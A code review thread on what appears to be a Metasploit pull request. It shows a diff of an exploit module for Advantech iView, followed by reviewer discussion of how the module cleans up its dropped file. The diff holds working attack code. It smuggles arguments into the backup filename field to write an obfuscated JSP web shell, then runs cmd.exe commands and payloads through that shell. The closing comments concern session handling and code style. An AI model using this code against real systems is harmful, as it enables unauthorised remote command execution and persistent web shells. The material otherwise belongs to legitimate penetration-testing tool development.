modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb

```diff
@@ -0,0 +1,189 @@
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    return CheckCode::Unknown('Failed to receive a response from the application') unless res
+
+    unless res.body.include?('iView')
+      return CheckCode::Safe('No confirmation that target is Advantech iView')
+    end
+
+    res = send_db_backup_request('')
+    return CheckCode::Detected('Failed to receive response from backup request') unless res
+
+    # The patch added auth as a requirement for
+    # accessing the NetworkServlet endpoint
+    return CheckCode::Appears unless res.body =~ /ERROR:\s+User\s+Not\sLogin/
+
+    CheckCode::Detected
+  end
+
+  def send_db_backup_request(filename)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' =>
+      {
+        'page_action_type' => 'backupDatabase',
+        'backup_filename' => filename
+      }
+    )
+  end
+
+  def format_jsp
+    bin_nums = []
+    arg_nums = []
+    flag_nums = []
+
+    bin_param.each_char { |c| bin_nums << c.ord }
+    bin_nums = bin_nums.join(',')
+    arg_param.each_char { |c| arg_nums << c.ord }
+    arg_nums = arg_nums.join(',')
+    flag_param.each_char { |c| flag_nums << c.ord }
+    flag_nums = flag_nums.join(',')
+
+    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \
+    'new ProcessBuilder(request.getParameter(' \
+    "new java.lang.String(new byte[]{#{bin_nums}}))," \
+    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \
+    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \
+    '.getInputStream()))%>'
+  end
+
+  def flag_param
+    @flag_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def arg_param
+    @arg_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def bin_param
+    @bin_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, jsp_filename),
+      'vars_get' =>
+      {
+        bin_param => 'cmd.exe',
+        flag_param => '/c',
+        arg_param => cmd
+      }
+    )
+  end
+
+  def exploit
+    jsp_code = format_jsp
+
+    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
+    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""
+
+    res = send_db_backup_request(full_cmd)
+    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
+
+    if target['Type'] == :win_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
+  end
+
+  def on_new_session(session)
+    super
+
+    path = "webapps\\iView3\\#{jsp_filename}"
+    if session.fs.file.exist?(path)
+      vprint_status("Deleting #{jsp_filename}...")
+      session.fs.file.rm(path)
```

Comment:
I believe this is only compatible with Meterpreter sessions and since this module also accepts `ARCH_CMD` payloads, this won't work if the user select the `Windows Command` target.

The `file_exist?` and `rm_f` from the `Msf::Post::File` mixin can be used instead, since it includes logic that handles multiple session types. The problem is since it is not a local or post module, the global `session` is not available and it will fail. I found a workaround to this: define a `session` method in the module that returns the session object passed to `on_new_session`:
```suggestion
  def session
    @session
  end

  def on_new_session(session)
    super

    path = "webapps\\iView3\\#{jsp_filename}"
    @session = session
    if file_exist?(path)
      vprint_status("Deleting #{jsp_filename}...")
      rm_f(path)
```
I'm not sure if it is correct and if there is no side effect doing this, but it seems to work fine with both targets.

Reply:
Just from today's sync-up with @cdelafuente-r7 - this may introduce an anti-pattern into the codebase that we'd like to avoid folk copy/pasting into other modules

It might be worth taking a deeper look into why the file isn't being deleted with the normal file dropper logic - as it might be impacting other modules